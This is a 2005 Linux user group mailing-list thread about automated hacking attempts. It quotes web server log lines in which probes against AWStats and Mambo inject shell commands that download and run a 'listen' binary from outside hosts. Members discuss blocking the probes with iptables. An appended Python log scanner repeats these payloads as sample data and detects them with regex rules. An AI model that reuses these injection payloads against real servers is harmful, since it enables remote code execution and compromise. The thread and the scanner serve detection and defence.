[plug] Scripted hacking attempts

Bennett, Phillip Phillip.Bennett at bestroads.com.au
Thu Dec 22 13:47:36 WST 2005


Bill,

May I have a copy of this script for my system at home?

Thanks,
Phil.
 

-----Original Message-----
From: plug-bounces at plug.org.au [mailto:plug-bounces at plug.org.au] On
Behalf Of William Kenworthy
Sent: Wednesday, 21 December 2005 7:21 PM
To: plug at plug.org.au
Subject: Re: [plug] Scripted hacking attempts

They've been around for a few weeks.  I drop them using a string match
on port 80 (iptables), and once they've triggered it, all packets to/from
that source are dropped - no point in letting them try something else
that I might have missed!  I think most came from China from memory -
geoip helps there, as well as blocking the messenger spam.

BillK


On Wed, 2005-12-21 at 17:02 +0800, Kai wrote:
> Hi guys and girls,
> 
> FYI, I don't know if anyone else is seeing a rash of these but I've 
> had a few in the last coupla days.
> 
> 12.175.196.99 - - [21/Dec/2005:10:55:02 +0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 340
> 12.175.196.99 - - [21/Dec/2005:10:55:06 +0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 340
> 12.175.196.99 - - [21/Dec/2005:10:55:13 +0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 331
> 12.175.196.99 - - [21/Dec/2005:10:55:08 +0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 348
> 12.175.196.99 - - [21/Dec/2005:10:55:10 +0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 332
> 12.175.196.99 - - [21/Dec/2005:10:55:14 +0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 338
> 12.175.196.99 - - [21/Dec/2005:10:55:17 +0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 336
> 12.175.196.99 - - [21/Dec/2005:10:55:23 +0800] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 342
> 
> Cheers
> Kai
> 
--
William Kenworthy <billk at iinet.net.au>
Home!
_______________________________________________
PLUG discussion list: plug at plug.org.au
http://www.plug.org.au/mailman/listinfo/plug
Committee e-mail: committee at plug.linux.org.au
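
An added example, not part of any message in this thread and not the script asked about above: a log scanner that percent-decodes each request before matching the two probe shapes quoted in the thread (a pipe in the AWStats `configdir` parameter, a remote URL in Mambo's `mosConfig_absolute_path`). It assumes Apache common log format; the rule names, function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the excerpt in the thread; addresses are
# documentation ranges, and the last probe's 200 status is invented for contrast.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Dec/2005:10:55:02 +0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198.51.100.7%2flisten%3bchmod%20%2bx%20listen;echo%20YYY;echo| HTTP/1.1" 404 340
192.0.2.10 - - [21/Dec/2005:10:55:14 +0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.9/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.7/listen;chmod%20744%20listen HTTP/1.1" 404 338
192.0.2.44 - - [21/Dec/2005:10:56:00 +0800] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 200 5120
192.0.2.45 - - [21/Dec/2005:10:57:30 +0800] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 2048
192.0.2.77 - - [21/Dec/2005:10:58:41 +0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;echo| HTTP/1.1" 200 912
"""

# Common log format: host, ident, user, [time], "METHOD URL PROTO", status, size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*) HTTP/[\d.]+" (\d{3}) \S+')

# Rule names and patterns are this example's own; they run on the decoded URL.
RULES = [
    ("awstats-configdir-pipe", re.compile(r"awstats\.pl\?.*configdir=[^&]*\|", re.I)),
    ("mambo-remote-include", re.compile(r"mosConfig_absolute_path=(?:https?|ftp)://", re.I)),
    ("shell-fetch", re.compile(r"[;|]\s*(?:wget|curl)\s", re.I)),
]

def decode(url, rounds=3):
    """Percent-decode until stable so %3b and %253b both end up as ';'."""
    for _ in range(rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url

def scan(log_text):
    """Map each source address to the rules it matched and the statuses returned."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, url, status = m.groups()
        matched = {name for name, rx in RULES if rx.search(decode(url))}
        if matched:
            entry = hits.setdefault(ip, {"rules": set(), "statuses": set()})
            entry["rules"] |= matched
            entry["statuses"].add(int(status))
    return hits

def needs_triage(hits):
    """Sources with a matching request that was answered with anything but 404."""
    return sorted(ip for ip, e in hits.items() if e["statuses"] - {404})
```

Calling `needs_triage(scan(SAMPLE_LOG))` separates probes of paths that do not exist, like every request in the quoted excerpt, from probes that reached a path the server actually answered.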


